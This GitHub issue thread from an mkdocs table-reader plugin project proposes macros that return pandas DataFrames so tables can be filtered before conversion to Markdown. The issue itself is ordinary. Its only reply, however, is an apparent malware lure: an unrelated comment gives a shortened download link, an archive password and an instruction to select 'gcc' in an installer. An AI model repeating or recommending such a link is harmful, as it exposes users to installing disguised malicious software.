### ISSUE TITLE
Be able to filter tables

### ISSUE THREAD

**Issue by timvink** [timvink/mkdocs-table-reader-plugin#73]
With macros enabled, we want to be able to do something like this:

```markdown
{{ read_csv("basic_table.csv").query("a > 40") }}
```

That fails with `jinja2.exceptions.UndefinedError: 'str object' has no attribute 'query'`. 

That's because `read_csv` is actually doing both reading the file and creating the markdown table, and returning the string.

We could register a couple of additional macros, one for each reader, such as: `pd_read_csv`. That will return a pandas DataFrame that we can process with `.query` for example.

We also then need to register a filter like `convert_to_md_table` that does the tabulation for us.

What then would work is:

```markdown
{{ pd_read_csv("basic_table.csv").query("a > 40") | convert_to_md_table }}
```

After we get that working, we should also:

- Update the docs/ howto jinja page with an example
- Update the available readers in the docs, explaining which are only available with macros enabled
- Promote the extra possibilities in the README
- Update this discussion: `https://github.com/squidfunk/mkdocs-material/discussions/3315#discussioncomment-5066920`

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
